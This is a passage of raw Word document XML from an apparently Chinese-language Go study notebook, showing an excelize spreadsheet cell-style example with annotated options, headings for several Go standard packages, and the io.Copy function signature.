        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Color: "#0000FF",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DA2D41" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}, Alignment: &amp;excelize.Alignment{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2206EC69" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Horizontal: "center", // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>水平对齐方式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> center left right fill(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>填充</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>) justify(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两端对齐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)  centerContinuous(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨列居中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>) distributed(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分散对齐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA82ACB" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Vertical:   "center", // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>垂直对齐方式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> center top  justify distributed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147EA5DC" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// Indent:     1,        // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缩进</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只要有值就变成了左对齐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缩进</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ADA2FD" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// TextRotation: 30, // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>旋转</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7552BB58" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// RelativeIndent:  10,   // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>好像没啥用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EA0D58" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// ReadingOrder:    0,    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不知道怎么设置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0E8B84" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// JustifyLastLine: true, // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两端分散对齐，只有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>水平对齐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> distributed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">true </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>才有效</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480AF051" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// WrapText:        true, // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自动换行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B22815" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// ShrinkToFit:     true, // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缩小字体以填充单元格</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB8A849" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}, Protection: &amp;excelize.Protection{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561CDF9F" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Hidden: true, // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>貌似没啥用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBBAE34" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Locked: true, // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>貌似没啥用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3716D9C2" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">}, NumFmt: 0, // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内置的数字格式样式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   0-638  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0-58  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用，因为语言不同样式不同</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具体的样式参照文档</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ACAB4A" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Lang:          "zh-cn", // zh-cn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中文</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3533F81F" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">DecimalPlaces: 2,       // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>小数位数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NumFmt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2-11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有效</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C2869F" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// CustomNumFmt: "",// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自定义样式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是指针，只能通过变量的方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B34593" w14:textId="77777777" w:rsidR="008F28F5" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">NegRed: true, // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不知道具体的含义</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8B0960" w14:textId="2280DAA4" w:rsidR="00F95BE2" w:rsidRDefault="008F28F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F39AAB" w14:textId="77777777" w:rsidR="00F95BE2" w:rsidRDefault="00F95BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03815017" w14:textId="77777777" w:rsidR="00F95BE2" w:rsidRDefault="00F95BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12EA3E27" w14:textId="77777777" w:rsidR="00F95BE2" w:rsidRDefault="00F95BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F5F0FB2" w14:textId="77777777" w:rsidR="00F95BE2" w:rsidRDefault="00F95BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CE9FBFA" w14:textId="77777777" w:rsidR="00F95BE2" w:rsidRDefault="00F95BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77747744" w14:textId="77777777" w:rsidR="00F95BE2" w:rsidRDefault="00F95BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A10568D" w14:textId="77777777" w:rsidR="00F95BE2" w:rsidRDefault="00F95BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FD539F5" w14:textId="77777777" w:rsidR="00F95BE2" w:rsidRDefault="00F95BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="621D6AEE" w14:textId="77777777" w:rsidR="00F95BE2" w:rsidRDefault="00F95BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D9C2147" w14:textId="77777777" w:rsidR="00F95BE2" w:rsidRDefault="00F95BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09B55B17" w14:textId="77777777" w:rsidR="00F95BE2" w:rsidRDefault="00F95BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D7440F9" w14:textId="77777777" w:rsidR="00F95BE2" w:rsidRDefault="00F95BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FED4C1A" w14:textId="77777777" w:rsidR="00F95BE2" w:rsidRDefault="00F95BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D8D4B67" w14:textId="77777777" w:rsidR="00F95BE2" w:rsidRDefault="00F95BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00926C9D" w14:textId="77777777" w:rsidR="00F95BE2" w:rsidRDefault="00F95BE2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68C84039" w14:textId="6554C12B" w:rsidR="00EE5BC9" w:rsidRDefault="00EE5BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F836F20" w14:textId="704B1D07" w:rsidR="00EE5BC9" w:rsidRDefault="00EE5BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CA57FDF" w14:textId="442737E6" w:rsidR="00EE5BC9" w:rsidRDefault="00EE5BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F983AA3" w14:textId="77777777" w:rsidR="00EE5BC9" w:rsidRDefault="00EE5BC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DF3EA65" w14:textId="77777777" w:rsidR="00E51F77" w:rsidRDefault="00E51F77" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ADA1D6F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="349" w:name="_Toc159779805"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>context</w:t>
      </w:r>
      <w:bookmarkEnd w:id="349"/>
    </w:p>
    <w:p w14:paraId="7CA824DB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="350" w:name="_Toc159779806"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>testing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="350"/>
    </w:p>
    <w:p w14:paraId="599AD739" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="351" w:name="_Toc159779807"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>github.com/golang/mock/gomock</w:t>
      </w:r>
      <w:bookmarkEnd w:id="351"/>
    </w:p>
    <w:p w14:paraId="243F94AE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="352" w:name="_Toc159779808"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>errors</w:t>
      </w:r>
      <w:bookmarkEnd w:id="352"/>
    </w:p>
    <w:p w14:paraId="36378B10" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="353" w:name="_Toc159779809"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>io</w:t>
      </w:r>
      <w:bookmarkEnd w:id="353"/>
    </w:p>
    <w:p w14:paraId="0BDEB2F7" w14:textId="3F21D68B" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="103063F2" w14:textId="526C7097" w:rsidR="008832F3" w:rsidRDefault="008832F3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25284599" w14:textId="6A8CA354" w:rsidR="002E0B0B" w:rsidRDefault="002E0B0B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>io</w:t>
      </w:r>
      <w:r>
        <w:t>.Copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F30C6A5" w14:textId="35AF1CB6" w:rsidR="008832F3" w:rsidRDefault="008832F3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56B4AD41" w14:textId="77777777" w:rsidR="001B20AC" w:rsidRDefault="001B20AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>src/io/io.go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C677C10" w14:textId="77777777" w:rsidR="001B20AC" w:rsidRDefault="001B20AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="590F6FC4" w14:textId="77777777" w:rsidR="001B20AC" w:rsidRDefault="001B20AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func Copy(dst Writer, src Reader) (written int64, err error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403F9914" w14:textId="77777777" w:rsidR="001B20AC" w:rsidRDefault="001B20AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>return copyBuffer(dst, src, nil)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ED425E" w14:textId="62E07D2A" w:rsidR="002E0B0B" w:rsidRDefault="001B20AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CF1F3C" w14:textId="2BEE056F" w:rsidR="002E0B0B" w:rsidRDefault="002E0B0B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6553357C" w14:textId="4437BECC" w:rsidR="002E0B0B" w:rsidRDefault="002E0B0B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="299F6F67" w14:textId="64818D58" w:rsidR="002E0B0B" w:rsidRDefault="002E0B0B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59185B62" w14:textId="1676A674" w:rsidR="002E0B0B" w:rsidRDefault="002E0B0B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
